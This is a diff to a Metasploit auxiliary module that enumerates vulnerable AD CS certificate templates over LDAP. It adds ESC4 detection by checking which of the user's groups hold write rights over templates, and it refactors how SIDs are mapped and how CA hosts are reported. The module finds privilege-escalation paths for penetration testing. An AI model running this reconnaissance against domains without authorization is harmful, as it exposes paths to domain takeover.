    'ESC1' => [ 'https://posts.specterops.io/certified-pre-owned-d95910965cd2' ],
    'ESC2' => [ 'https://posts.specterops.io/certified-pre-owned-d95910965cd2' ],
    'ESC3' => [ 'https://posts.specterops.io/certified-pre-owned-d95910965cd2' ],
+    'ESC4' => [ 'https://posts.specterops.io/certified-pre-owned-d95910965cd2' ],
    'ESC13' => [ 'https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53' ],
    'ESC15' => [ 'https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc' ]
  }.freeze

  SID = Struct.new(:value, :name) do
+    def ==(other)
+      value == other.value
+    end
+
    def to_s
-      name.present? ? "#{value} (#{name})" : value
+      name.present? ? "#{value} (#{name})" : value.to_s
    end

    def rid
@@ -29,6 +36,8 @@ class MetasploitModule < Msf::Auxiliary
    end
  end

+  attr_reader :certificate_details
+
  def initialize(info = {})
    super(
      update_info(
@@ -45,13 +54,14 @@ class MetasploitModule < Msf::Auxiliary
          allows enrollment in and which SIDs are authorized to use that certificate server to
          perform this enrollment operation.

-          Currently the module is capable of checking for certificates that are vulnerable to ESC1, ESC2, ESC3, ESC13,
-          and ESC15. The module is limited to checking for these techniques due to them being identifiable remotely from
-          a normal user account by analyzing the objects in LDAP.
+          Currently the module is capable of checking for certificates that are vulnerable to ESC1, ESC2, ESC3, ESC4,
+          ESC13, and ESC15. The module is limited to checking for these techniques due to them being identifiable
+          remotely from a normal user account by analyzing the objects in LDAP.
        },
        'Author' => [
          'Grant Willcox', # Original module author
-          'Spencer McIntyre' # ESC13 and ESC15 updates
+          'Spencer McIntyre', # ESC13 and ESC15 updates
+          'jheysel-r7' # ESC4 update
        ],
        'References' => [
          [ 'URL', 'https://posts.specterops.io/certified-pre-owned-d95910965cd2' ],
@@ -80,6 +90,8 @@ class MetasploitModule < Msf::Auxiliary
  end

  # Constants Definition
+  CERTIFICATE_ATTRIBUTES = %w[cn name description nTSecurityDescriptor msPKI-Certificate-Policy msPKI-Enrollment-Flag msPKI-RA-Signature msPKI-Template-Schema-Version pkiExtendedKeyUsage]
+  CERTIFICATE_TEMPLATES_BASE = 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration'.freeze
  CERTIFICATE_ENROLLMENT_EXTENDED_RIGHT = '0e10c968-78fb-11d2-90d4-00c04f79dc55'.freeze
  CERTIFICATE_AUTOENROLLMENT_EXTENDED_RIGHT = 'a05b8cc2-17bc-4802-a710-e7c15ab866a2'.freeze
  CONTROL_ACCESS = 0x00000100
@@ -91,27 +103,32 @@ class MetasploitModule < Msf::Auxiliary
  DACL_SECURITY_INFORMATION = 0x4
  SACL_SECURITY_INFORMATION = 0x8

-  def parse_acl(acl)
-    allowed_sids = []
+  # This returns a list of SIDs that have the CERTIFICATE_ENROLLMENT_EXTENDED_RIGHT or CERTIFICATE_AUTOENROLLMENT_EXTENDED_RIGHT for the given ACL
+  def enum_acl_aces(acl)
    acl.aces.each do |ace|
-      ace_header = ace[:header]
-      ace_body = ace[:body]
-      if ace_body[:access_mask].blank?
+      if ace[:body][:access_mask].blank?
        fail_with(Failure::UnexpectedReply, 'Encountered a DACL/SACL object without an access mask! Either data is an unrecognized type or we are reading it wrong!')
      end
-      ace_type_name = Rex::Proto::MsDtyp::MsDtypAceType.name(ace_header[:ace_type])
+      ace_type_name = Rex::Proto::MsDtyp::MsDtypAceType.name(ace[:header][:ace_type])
      if ace_type_name.blank?
-        print_error("Skipping unexpected ACE of type #{ace_header[:ace_type]}. Either the data was read incorrectly or we currently don't support this type.")
+        print_error("Skipping unexpected ACE of type #{ace[:header][:ace_type]}. Either the data was read incorrectly or we currently don't support this type.")
        next
      end
-      if ace_header[:ace_flags][:inherit_only_ace] == 1
-        vprint_warning('      ACE only affects those that inherit from it, not those that it is attached to. Ignoring this ACE, as its not relevant.')
+      if ace[:header][:ace_flags][:inherit_only_ace] == 1
+        # ACE only affects those that inherit from it, not those that it is attached to. Ignoring this ACE, as its not relevant.
        next
      end

+      yield ace_type_name, ace
+    end
+  end
+
+  def get_sids_for_enroll(acl)
+    allowed_sids = []
+    enum_acl_aces(acl) do |ace_type_name, ace|
      # To decode the ObjectType we need to do another query to CN=Configuration,DC=daforest,DC=com
      # and look at either schemaIDGUID or rightsGUID fields to see if they match this value.
-      if (object_type = ace_body[:object_type]) && !(object_type == CERTIFICATE_ENROLLMENT_EXTENDED_RIGHT || object_type == CERTIFICATE_AUTOENROLLMENT_EXTENDED_RIGHT)
+      if (object_type = ace[:body][:object_type]) && !(object_type == CERTIFICATE_ENROLLMENT_EXTENDED_RIGHT || object_type == CERTIFICATE_AUTOENROLLMENT_EXTENDED_RIGHT)
        # If an object type was specified, only process the rest if it is one of these two (note that objects with no
        # object types will be processed to make sure we can detect vulnerable templates post exploiting ESC4).
        next
@@ -120,14 +137,31 @@ class MetasploitModule < Msf::Auxiliary
      # Skip entry if it is not related to an extended access control right, where extended access control right is
      # described as ADS_RIGHT_DS_CONTROL_ACCESS in the ObjectType field of ACCESS_ALLOWED_OBJECT_ACE. This is
      # detailed further at https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-access_allowed_object_ace
-      next unless (ace_body.access_mask.protocol & CONTROL_ACCESS) == CONTROL_ACCESS
+      next unless (ace[:body].access_mask.protocol & CONTROL_ACCESS) == CONTROL_ACCESS

      if ace_type_name.match(/ALLOWED/)
-        allowed_sids << ace_body[:sid].to_s
+        allowed_sids << ace[:body][:sid]
      end
    end

-    allowed_sids
+    map_sids_to_names(allowed_sids)
+  end
+
+  # This will return a list of SIDs that can edit the template from which the ACL is derived
+  # The method checks the WriteOwner, WriteDacl and GenericWrite bits of the access_mask to see if the user or group has write permissions over the Certificate
+  def get_sids_for_write(acl)
+    allowed_sids = []
+
+    enum_acl_aces(acl) do |_ace_type_name, ace|
+      # Look at WriteOwner, WriteDacl and GenericWrite to see if the user has write permissions over the Certificate
+      if !(ace[:body][:access_mask][:wo] == 1 || ace[:body][:access_mask][:wd] == 1 || ace[:body][:access_mask][:gw] == 1)
+        next
+      end
+
+      allowed_sids << ace[:body][:sid]
+    end
+
+    map_sids_to_names(allowed_sids)
  end

  def query_ldap_server(raw_filter, attributes, base_prefix: nil)
@@ -166,71 +200,46 @@ class MetasploitModule < Msf::Auxiliary
    returned_entries
  end

-  def query_ldap_server_certificates(esc_raw_filter, esc_name, notes: [])
-    attributes = ['cn', 'description', 'ntSecurityDescriptor', 'msPKI-Enrollment-Flag', 'msPKI-RA-Signature', 'PkiExtendedKeyUsage']
-    base_prefix = 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration'
-    esc_entries = query_ldap_server(esc_raw_filter, attributes, base_prefix: base_prefix)
+  def query_ldap_server_certificates(esc_raw_filter, esc_id, notes: [])
+    esc_entries = query_ldap_server(esc_raw_filter, CERTIFICATE_ATTRIBUTES, base_prefix: CERTIFICATE_TEMPLATES_BASE)

    if esc_entries.empty?
-      print_warning("Couldn't find any vulnerable #{esc_name} templates!")
+      print_warning("Couldn't find any vulnerable #{esc_id} templates!")
      return
    end

    # Grab a list of certificates that contain vulnerable settings.
    # Also print out the list of SIDs that can enroll in that server.
    esc_entries.each do |entry|
-      begin
-        security_descriptor = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.read(entry[:ntsecuritydescriptor][0])
-      rescue IOError => e
-        fail_with(Failure::UnexpectedReply, "Unable to read security descriptor! Error was: #{e.message}")
-      end
-
-      allowed_sids = parse_acl(security_descriptor.dacl) if security_descriptor.dacl
-      next if allowed_sids.empty?
-      next if allowed_sids.empty?
-
      certificate_symbol = entry[:cn][0].to_sym
-      if @vuln_certificate_details.key?(certificate_symbol)
-        @vuln_certificate_details[certificate_symbol][:vulns] << esc_name
-        @vuln_certificate_details[certificate_symbol][:notes] += notes
-      else
-        @vuln_certificate_details[certificate_symbol] = {
-          vulns: [esc_name],
-          dn: entry[:dn][0],
-          certificate_enrollment_sids: convert_sids_to_human_readable_name(allowed_sids),
-          ca_servers_n_enrollment_sids: {},
-          manager_approval: ([entry[%s(mspki-enrollment-flag)].first.to_i].pack('l').unpack1('L') & Rex::Proto::MsCrtd::CT_FLAG_PEND_ALL_REQUESTS) != 0,
-          required_signatures: [entry[%s(mspki-ra-signature)].first.to_i].pack('l').unpack1('L'),
-          notes: notes
-        }
-      end
+      next if @certificate_details[certificate_symbol][:enroll_sids].empty?
+
+      @certificate_details[certificate_symbol][:techniques] << esc_id
+      @certificate_details[certificate_symbol][:notes] += notes
    end
  end

-  def convert_sids_to_human_readable_name(sids_array)
-    output = []
-    for sid in sids_array
-      raw_filter = "(objectSID=#{ldap_escape_filter(sid.to_s)})"
-      attributes = ['sAMAccountName', 'name']
-      base_prefix = 'CN=Configuration'
-      sid_entry = query_ldap_server(raw_filter, attributes, base_prefix: base_prefix) # First try with prefix to find entries that may be group specific.
-      sid_entry = query_ldap_server(raw_filter, attributes) if sid_entry.empty? # Retry without prefix if blank.
-      if sid_entry.empty?
+  def map_sids_to_names(sids_array)
+    mapped = []
+    sids_array.each do |sid|
+      # this common SID doesn't always have an entry
+      if sid == Rex::Proto::Secauthz::WellKnownSids::SECURITY_AUTHENTICATED_USER_SID
+        mapped << SID.new(sid, 'Authenticated Users')
+        next
+      end
+
+      sid_entry = get_object_by_sid(sid)
+      if sid_entry.nil?
        print_warning("Could not find any details on the LDAP server for SID #{sid}!")
-        output << [sid, nil, nil] # Still want to print out the SID even if we couldn't get additional information.
-      elsif sid_entry[0][:samaccountname][0]
-        output << [sid, sid_entry[0][:name][0], sid_entry[0][:samaccountname][0]]
-      else
-        output << [sid, sid_entry[0][:name][0], nil]
+        mapped << SID.new(sid, name)
+      elsif sid_entry[:samaccountname].present?
+        mapped << SID.new(sid, sid_entry[:samaccountname].first.to_s)
+      elsif sid_entry[:name].present?
+        mapped << SID.new(sid, sid_entry[:name].first.to_s)
      end
    end

-    results = []
-    output.each do |sid_string, sid_name, sam_account_name|
-      results << SID.new(sid_string, sam_account_name || sid_name)
-    end
-
-    results
+    mapped
  end

  def find_esc1_vuln_cert_templates
@@ -285,14 +294,14 @@ class MetasploitModule < Msf::Auxiliary
    notes = [
      'ESC3: Template defines the Certificate Request Agent OID (PkiExtendedKeyUsage)'
    ]
-    query_ldap_server_certificates(esc3_template_1_raw_filter, 'ESC3_TEMPLATE_1', notes: notes)
+    query_ldap_server_certificates(esc3_template_1_raw_filter, 'ESC3', notes: notes)

    # Find the second vulnerable types of ESC3 templates, those that
    # have the right template schema version and, for those with a template
    # version of 2 or greater, have an Application Policy Insurance Requirement
    # requiring the Certificate Request Agent EKU.
    #
-    # Additionally the certificate template must also allow for domain authentication
+    # Additionally, the certificate template must also allow for domain authentication
    # and the CA must not have any enrollment agent restrictions.
    esc3_template_2_raw_filter = '(&'\
      '(objectclass=pkicertificatetemplate)'\
@@ -315,6 +324,110 @@ class MetasploitModule < Msf::Auxiliary
    query_ldap_server_certificates(esc3_template_2_raw_filter, 'ESC3_TEMPLATE_2')
  end

+  def find_esc4_vuln_cert_templates
+    # Determine who we are authenticating with. Retrieve the username and user SID
+    whoami_response = ''
+    begin
+      whoami_response = @ldap.ldapwhoami
+    rescue Net::LDAP::Error => e
+      print_warning("The module failed to run the ldapwhoami command, ESC4 detection can't continue. Error was: #{e.class}: #{e.message}.")
+      return
+    end
+
+    if whoami_response.empty?
+      print_error("Unable to retrieve the username using ldapwhoami, ESC4 detection can't continue")
+      return
+    end
+
+    sam_account_name = whoami_response.split('\\')[1]
+    user_raw_filter = "(sAMAccountName=#{sam_account_name})"
+    attributes = ['DN', 'objectSID', 'objectClass', 'primarygroupID']
+    our_account = query_ldap_server(user_raw_filter, attributes)&.first
+    if our_account.nil?
+      print_warning("Unable to determine the User SID for #{sam_account_name}, ESC4 detection can't continue")
+      return
+    end
+
+    user_sid = map_sids_to_names([Rex::Proto::MsDtyp::MsDtypSid.read(our_account[:objectsid].first).value]).first
+    domain_sid = user_sid.value.to_s.rpartition('-').first
+    user_groups = []
+
+    if our_account[:primarygroupID]
+      user_groups << "#{domain_sid}-#{our_account[:primarygroupID]&.first}"
+    end
+
+    # Authenticated Users includes all users and computers with identities that have been authenticated.
+    # Authenticated Users doesn't include Guest even if the Guest account has a password.
+    unless sam_account_name == 'Guest'
+      user_groups << Rex::Proto::Secauthz::WellKnownSids::SECURITY_AUTHENTICATED_USER_SID
+    end
+
+    # Perform an LDAP query to get the groups the user is a part of
+    # Use LDAP_MATCHING_RULE_IN_CHAIN OID in order to walk the chain of ancestry of groups.
+    # https://learn.microsoft.com/en-us/windows/win32/adsi/search-filter-syntax?redirectedfrom=MSDN
+    filter_with_user = "(|(member:1.2.840.113556.1.4.1941:=#{our_account[:dn].first})"
+    user_groups.each do |sid|
+      obj = get_object_by_sid(sid)
+      print_error('Failed to lookup SID.') unless obj
+
+      filter_with_user << "(member:1.2.840.113556.1.4.1941:=#{obj[:dn].first})" if obj
+    end
+    filter_with_user << ')'
+
+    attributes = ['cn', 'objectSID']
+    esc_entries = query_ldap_server(filter_with_user, attributes)
+
+    esc_entries.each do |entry|
+      group_sid = Rex::Proto::MsDtyp::MsDtypSid.read(entry['ObjectSid'].first).value
+      user_groups << group_sid
+    end
+    user_groups = map_sids_to_names(user_groups)
+
+    # Determine what Certificate Templates are available to us
+    esc_raw_filter = '(objectclass=pkicertificatetemplate)'
+
+    attributes = ['cn', 'description', 'ntSecurityDescriptor']
+    esc_entries = query_ldap_server(esc_raw_filter, attributes, base_prefix: CERTIFICATE_TEMPLATES_BASE)
+
+    return if esc_entries.empty?
+
+    # Determine if the user we've authenticated with has the ability to edit
+    esc_entries.each do |entry|
+      certificate_symbol = entry[:cn][0].to_sym
+      next if @certificate_details[certificate_symbol][:enroll_sids].empty?
+
+      # SIDs that can edit the template
+      write_priv_sids = @certificate_details[certificate_symbol][:write_sids]
+      next if write_priv_sids.empty?
+
+      # Check if the user has been give access to edit the template
+      user_can_edit = user_sid if write_priv_sids.include?(user_sid)
+
+      # Check if any groups the user is a part of can edit the template
+      group_can_edit = write_priv_sids & user_groups
+
+      # SIDs that can edit the template that the user we've authenticated with are also a part of
+      user_write_priv_sids = []
+      notes = []
+
+      # Main reason for splitting user_can_edit and group_can_edit is so "note" can be more descriptive
+      if user_can_edit
+        user_write_priv_sids << user_can_edit
+        notes << "ESC4: The account: #{sam_account_name} has edit permissions over the template #{certificate_symbol} making it vulnerable to ESC4"
+      end
+
+      if group_can_edit.any?
+        user_write_priv_sids.concat(group_can_edit)
+        notes << "ESC4: The account: #{sam_account_name} is a part of the following groups: (#{group_can_edit.map(&:name).join(', ')}) which have edit permissions over the template object"
+      end
+
+      next unless user_write_priv_sids.any?
+
+      @certificate_details[certificate_symbol][:techniques] << 'ESC4'
+      @certificate_details[certificate_symbol][:notes].concat(notes)
+    end
+  end
+
  def find_esc13_vuln_cert_templates
    esc_raw_filter = <<~FILTER
      (&
@@ -324,9 +437,7 @@ class MetasploitModule < Msf::Auxiliary
        (mspki-certificate-policy=*)
      )
    FILTER
-    attributes = ['cn', 'description', 'ntSecurityDescriptor', 'msPKI-Certificate-Policy']
-    base_prefix = 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration'
-    esc_entries = query_ldap_server(esc_raw_filter, attributes, base_prefix: base_prefix)
+    esc_entries = query_ldap_server(esc_raw_filter, CERTIFICATE_ATTRIBUTES, base_prefix: CERTIFICATE_TEMPLATES_BASE)

    if esc_entries.empty?
      print_warning("Couldn't find any vulnerable ESC13 templates!")
@@ -336,14 +447,8 @@ class MetasploitModule < Msf::Auxiliary
    # Grab a list of certificates that contain vulnerable settings.
    # Also print out the list of SIDs that can enroll in that server.
    esc_entries.each do |entry|
-      begin
-        security_descriptor = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.read(entry[:ntsecuritydescriptor][0])
-      rescue IOError => e
-        fail_with(Failure::UnexpectedReply, "Unable to read security descriptor! Error was: #{e.message}")
-      end
-
-      allowed_sids = parse_acl(security_descriptor.dacl) if security_descriptor.dacl
-      next if allowed_sids.empty?
+      certificate_symbol = entry[:cn][0].to_sym
+      next if @certificate_details[certificate_symbol][:enroll_sids].empty?

      groups = []
      entry['mspki-certificate-policy'].each do |certificate_policy_oid|
@@ -363,17 +468,39 @@ class MetasploitModule < Msf::Auxiliary
      end
      next if groups.empty?

-      note = "ESC13 groups: #{groups.join(', ')}"
      certificate_symbol = entry[:cn][0].to_sym
-      if @vuln_certificate_details.key?(certificate_symbol)
-        @vuln_certificate_details[certificate_symbol][:vulns] << 'ESC13'
-        @vuln_certificate_details[certificate_symbol][:notes] << note
-      else
-        @vuln_certificate_details[certificate_symbol] = { vulns: ['ESC13'], dn: entry[:dn][0], certificate_enrollment_sids: convert_sids_to_human_readable_name(allowed_sids), ca_servers_n_enrollment_sids: {}, notes: [note] }
-      end
+      @certificate_details[certificate_symbol][:techniques] << 'ESC13'
+      @certificate_details[certificate_symbol][:notes] << "ESC13 groups: #{groups.join(', ')}"
    end
  end

+  def build_certificate_details(ldap_object, techniques: [], notes: [])
+    security_descriptor = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.read(ldap_object[:ntsecuritydescriptor].first)
+
+    if security_descriptor.dacl
+      enroll_sids = get_sids_for_enroll(security_descriptor.dacl)
+      write_sids = get_sids_for_write(security_descriptor.dacl)
+    else
+      enroll_sids = nil
+      write_sids = nil
+    end
+
+    {
+      name: ldap_object[:cn][0].to_s,
+      techniques: techniques,
+      dn: ldap_object[:dn][0].to_s,
+      enroll_sids: enroll_sids,
+      write_sids: write_sids,
+      security_descriptor: security_descriptor,
+      ekus: ldap_object[:pkiextendedkeyusage].map(&:to_s),
+      schema_version: ldap_object[%s(mspki-template-schema-version)].first,
+      ca_servers: {},
+      manager_approval: ([ldap_object[%s(mspki-enrollment-flag)].first.to_i].pack('l').unpack1('L') & Rex::Proto::MsCrtd::CT_FLAG_PEND_ALL_REQUESTS) != 0,
+      required_signatures: [ldap_object[%s(mspki-ra-signature)].first.to_i].pack('l').unpack1('L'),
+      notes: notes
+    }
+  end
+
  def find_esc15_vuln_cert_templates
    esc_raw_filter = '(&'\
      '(objectclass=pkicertificatetemplate)'\
@@ -394,9 +521,9 @@ class MetasploitModule < Msf::Auxiliary
    # allows users to enroll in that certificate template and which users/groups
    # have permissions to enroll in certificates on each server.

-    @vuln_certificate_details.each_key do |certificate_template|
+    @certificate_details.each_key do |certificate_template|
      certificate_enrollment_raw_filter = "(&(objectClass=pKIEnrollmentService)(certificateTemplates=#{ldap_escape_filter(certificate_template.to_s)}))"
-      attributes = ['cn', 'dnsHostname', 'ntsecuritydescriptor']
+      attributes = ['cn', 'name', 'dnsHostname', 'ntsecuritydescriptor']
      base_prefix = 'CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration'
      enrollment_ca_data = query_ldap_server(certificate_enrollment_raw_filter, attributes, base_prefix: base_prefix)
      next if enrollment_ca_data.empty?
@@ -408,21 +535,47 @@ class MetasploitModule < Msf::Auxiliary
          fail_with(Failure::UnexpectedReply, "Unable to read security descriptor! Error was: #{e.message}")
        end

-        allowed_sids = parse_acl(security_descriptor.dacl) if security_descriptor.dacl
-        next if allowed_sids.empty?
+        enroll_sids = get_sids_for_enroll(security_descriptor.dacl) if security_descriptor.dacl
+        next if enroll_sids.empty?

-        ca_server_key = ca_server[:dnshostname][0].to_sym
-        unless @vuln_certificate_details[certificate_template][:ca_servers_n_enrollment_sids].key?(ca_server_key)
-          @vuln_certificate_details[certificate_template][:ca_servers_n_enrollment_sids][ca_server_key] = { cn: ca_server[:cn][0], ca_enrollment_sids: allowed_sids }
+        ca_server_fqdn = ca_server[:dnshostname][0].to_s.downcase
+        unless ca_server_fqdn.blank?
+          ca_server_ip_address = get_ip_addresses_by_fqdn(ca_server_fqdn)&.first
+
+          if ca_server_ip_address
+            report_service({
+              host: ca_server_ip_address,
+              port: 445,
+              proto: 'tcp',
+              name: 'AD CS',
+              info: "AD CS CA name: #{ca_server[:name][0]}"
+            })
+
+            report_host({
+              host: ca_server_ip_address,
+              name: ca_server_fqdn
+            })
+          end
        end
+
+        ca_server_key = ca_server_fqdn.to_sym
+        next if @certificate_details[certificate_template][:ca_servers].key?(ca_server_key)
+
+        @certificate_details[certificate_template][:ca_servers][ca_server_key] = {
+          fqdn: ca_server_fqdn,
+          ip_address: ca_server_ip_address,
+          enroll_sids: enroll_sids,
+          name: ca_server[:name][0].to_s,
+          dn: ca_server[:dn][0].to_s
+        }
      end
    end
  end

  def print_vulnerable_cert_info
-    vuln_certificate_details = @vuln_certificate_details.select do |_key, hash|
+    vuln_certificate_details = @certificate_details.sort.to_h.select do |_key, hash|
      select = true
-      select = false unless datastore['REPORT_PRIVENROLLABLE'] || hash[:certificate_enrollment_sids].any? do |sid|
+      select = false unless datastore['REPORT_PRIVENROLLABLE'] || hash[:enroll_sids].any? do |sid|
        # compare based on RIDs to avoid issues language specific issues
        !(sid.value.starts_with?("#{WellKnownSids::SECURITY_NT_NON_UNIQUE}-") && [
          # RID checks
@@ -437,36 +590,52 @@ class MetasploitModule < Msf::Auxiliary
        ].include?(sid.value)
      end

-      select = false unless datastore['REPORT_NONENROLLABLE'] || hash[:ca_servers_n_enrollment_sids].any?
+      select = false unless datastore['REPORT_NONENROLLABLE'] || hash[:ca_servers].any?
      select
    end

    any_esc3t1 = vuln_certificate_details.values.any? do |hash|
-      hash[:vulns].include?('ESC3_TEMPLATE_1') && (datastore['REPORT_NONENROLLABLE'] || hash[:ca_servers_n_enrollment_sids].any?)
+      hash[:techniques].include?('ESC3') && (datastore['REPORT_NONENROLLABLE'] || hash[:ca_servers].any?)
    end

    vuln_certificate_details.each do |key, hash|
-      vulns = hash[:vulns]
-      vulns.delete('ESC3_TEMPLATE_2') unless any_esc3t1 # don't report ESC3_TEMPLATE_2 if there are no instances of ESC3_TEMPLATE_1
-      next if vulns.empty?
+      techniques = hash[:techniques].dup
+      techniques.delete('ESC3_TEMPLATE_2') unless any_esc3t1 # don't report ESC3_TEMPLATE_2 if there are no instances of ESC3
+      next if techniques.empty?

-      vulns.each do |vuln|
-        vuln = 'ESC3' if vuln == 'ESC3_TEMPLATE_1'
-        next if vuln == 'ESC3_TEMPLATE_2'
+      if db
+        techniques.each do |vuln|
+          next if vuln == 'ESC3_TEMPLATE_2'

-        prefix = "#{vuln}:"
-        info = hash[:notes].select { |note| note.start_with?(prefix) }.map { |note| note.delete_prefix(prefix).strip }.join("\n")
-        info = nil if info.blank?
+          prefix = "#{vuln}:"
+          info = hash[:notes].select { |note| note.start_with?(prefix) }.map { |note| note.delete_prefix(prefix).strip }.join("\n")
+          info = nil if info.blank?

-        report_vuln(
-          host: rhost,
-          port: rport,
-          proto: 'tcp',
-          sname: 'AD CS',
-          name: "#{vuln} - #{key}",
-          info: info,
-          refs: REFERENCES[vuln]
-        )
+          hash[:ca_servers].each_value do |ca_server|
+            service = report_service({
+              host: ca_server[:ip_address],
+              port: 445,
+              proto: 'tcp',
+              name: 'AD CS',
+              info: "AD CS CA name: #{ca_server[:name]}"
+            })
+
+            if ca_server[:ip_address].present?
+              vuln = report_vuln(
+                host: ca_server[:ip_address],
+                port: 445,
+                proto: 'tcp',
+                sname: 'AD CS',
+                name: "#{vuln} - #{key}",
+                info: info,
+                refs: REFERENCES[vuln],
+                service: service
+              )
+            else
+              vuln = nil
+            end
+          end
+        end
      end

      print_good("Template: #{key}")
@@ -474,7 +643,7 @@ class MetasploitModule < Msf::Auxiliary
      print_status("  Distinguished Name: #{hash[:dn]}")
      print_status("  Manager Approval: #{hash[:manager_approval] ? '%redRequired' : '%grnDisabled'}%clr")
      print_status("  Required Signatures: #{hash[:required_signatures] == 0 ? '%grn0' : '%red' + hash[:required_signatures].to_s}%clr")
-      print_good("  Vulnerable to: #{vulns.join(', ')}")
+      print_good("  Vulnerable to: #{techniques.join(', ')}")
      if hash[:notes].present? && hash[:notes].length == 1
        print_status("  Notes: #{hash[:notes].first}")
      elsif hash[:notes].present? && hash[:notes].length > 1
@@ -484,16 +653,23 @@ class MetasploitModule < Msf::Auxiliary
        end
      end

+      if hash[:write_sids]
+        print_status(' Certificate Template Write-Enabled SIDs:')
+        hash[:write_sids].each do |sid|
+          print_status("    * #{highlight_sid(sid)}")
+        end
+      end
+
      print_status('  Certificate Template Enrollment SIDs:')
-      hash[:certificate_enrollment_sids].each do |sid|
+      hash[:enroll_sids].each do |sid|
        print_status("    * #{highlight_sid(sid)}")
      end

-      if hash[:ca_servers_n_enrollment_sids].any?
-        hash[:ca_servers_n_enrollment_sids].each do |ca_hostname, ca_hash|
-          print_good("  Issuing CA: #{ca_hash[:cn]} (#{ca_hostname})")
+      if hash[:ca_servers].any?
+        hash[:ca_servers].each do |ca_fqdn, ca_hash|
+          print_good("  Issuing CA: #{ca_hash[:name]} (#{ca_fqdn})")
          print_status('    Enrollment SIDs:')
-          convert_sids_to_human_readable_name(ca_hash[:ca_enrollment_sids]).each do |sid|
+          ca_hash[:enroll_sids].each do |sid|
            print_status("      * #{highlight_sid(sid)}")
          end
        end
@@ -515,7 +691,7 @@ class MetasploitModule < Msf::Auxiliary
  end

  def get_pki_object_by_oid(oid)
-    pki_object = @ldap_mspki_enterprise_oids.find { |o| o['mspki-cert-template-oid'].first == oid }
+    pki_object = @ldap_objects.find { |o| o['mspki-cert-template-oid']&.first == oid }

    if pki_object.nil?
      pki_object = query_ldap_server(
@@ -523,14 +699,14 @@ class MetasploitModule < Msf::Auxiliary
        nil,
        base_prefix: 'CN=OID,CN=Public Key Services,CN=Services,CN=Configuration'
      )&.first
-      @ldap_mspki_enterprise_oids << pki_object if pki_object
+      @ldap_objects << pki_object if pki_object
    end

    pki_object
  end

  def get_group_by_dn(group_dn)
-    group = @ldap_groups.find { |o| o['dn'].first == group_dn }
+    group = @ldap_objects.find { |o| o['dn']&.first == group_dn }

    if group.nil?
      cn, _, base = group_dn.partition(',')
@@ -540,18 +716,83 @@ class MetasploitModule < Msf::Auxiliary
        nil,
        base_prefix: base
      )&.first
-      @ldap_groups << group if group
+      @ldap_objects << group if group
    end

    group
  end

+  def get_object_by_sid(object_sid)
+    object_sid = Rex::Proto::MsDtyp::MsDtypSid.new(object_sid)
+    object = @ldap_objects.find { |o| o['objectSID'].first == object_sid.to_binary_s }
+
+    if object.nil?
+      object = query_ldap_server("(objectSID=#{ldap_escape_filter(object_sid.to_s)})", nil)&.first
+      @ldap_objects << object if object
+    end
+
+    object
+  end
+
+  def get_ip_addresses_by_fqdn(host_fqdn)
+    return @fqdns[host_fqdn] if @fqdns.key?(host_fqdn)
+
+    vprint_status("Resolving addresses for #{host_fqdn} via DNS.")
+    begin
+      ip_addresses = Rex::Socket.getaddresses(host_fqdn)
+    rescue ::SocketError
+      print_warning("No IP addresses were found for #{host_fqdn} via DNS.")
+    else
+      @fqdns[host_fqdn] = ip_addresses
+      vprint_status("Found #{ip_addresses.length} IP address#{ip_addresses.length > 1 ? 'es' : ''} via DNS.")
+      return ip_addresses
+    end
+
+    vprint_status("Looking up DNS records for #{host_fqdn} in LDAP.")
+    hostname, _, domain = host_fqdn.partition('.')
+    begin
+      results = query_ldap_server(
+        "(&(objectClass=dnsNode)(DC=#{ldap_escape_filter(hostname)}))",
+        %w[dnsRecord],
+        base_prefix: "DC=#{ldap_escape_filter(domain)},CN=MicrosoftDNS,DC=DomainDnsZones"
+      )
+    rescue Msf::Auxiliary::Failed
+      print_error('Encountered an error while querying LDAP for DNS records.')
+      @fqdns[host_fqdn] = nil
+    end
+    return nil if results.blank?
+
+    ip_addresses = []
+    results.first[:dnsrecord].each do |packed|
+      begin
+        unpacked = MsDnspDnsRecord.read(packed)
+      rescue ::EOFError
+        next
+      rescue ::IOError
+        next
+      end
+
+      next unless [ DnsRecordType::DNS_TYPE_A, DnsRecordType::DNS_TYPE_AAAA ].include?(unpacked.record_type)
+
+      ip_addresses << unpacked.data.to_s
+    end
+
+    @fqdns[host_fqdn] = ip_addresses
+    if ip_addresses.empty?
+      print_warning("No A or AAAA DNS records were found for #{host_fqdn} in LDAP.")
+    else
+      vprint_status("Found #{ip_addresses.length} IP address#{ip_addresses.length > 1 ? 'es' : ''} via A and AAAA DNS records.")
+    end
+
+    ip_addresses
+  end
+
  def run
    # Define our instance variables real quick.
    @base_dn = nil
-    @ldap_mspki_enterprise_oids = []
-    @ldap_groups = []
-    @vuln_certificate_details = {} # Initialize to empty hash since we want to only keep one copy of each certificate template along with its details.
+    @ldap_objects = []
+    @fqdns = {}
+    @certificate_details = {} # Initialize to empty hash since we want to only keep one copy of each certificate template along with its details.

    ldap_connect do |ldap|
      validate_bind_success!(ldap)
@@ -567,14 +808,25 @@ class MetasploitModule < Msf::Auxiliary
      end
      @ldap = ldap

+      templates = query_ldap_server('(objectClass=pkicertificatetemplate)', CERTIFICATE_ATTRIBUTES, base_prefix: CERTIFICATE_TEMPLATES_BASE)
+      fail_with(Failure::NotFound, 'No certificate templates were found.') if templates.empty?
+
+      templates.each do |template|
+        certificate_symbol = template[:cn].first.to_sym
+        @certificate_details[certificate_symbol] = build_certificate_details(template)
+      end
+
      find_esc1_vuln_cert_templates
      find_esc2_vuln_cert_templates
      find_esc3_vuln_cert_templates
+      find_esc4_vuln_cert_templates
      find_esc13_vuln_cert_templates
      find_esc15_vuln_cert_templates

      find_enrollable_vuln_certificate_templates
      print_vulnerable_cert_info
+
+      @certificate_details
    end
  rescue Errno::ECONNRESET
    fail_with(Failure::Disconnected, 'The connection was reset.')
@@ -129,9 +129,13 @@ class MetasploitModule < Msf::Auxiliary
    ldap_connect do |ldap|
      validate_bind_success!(ldap)

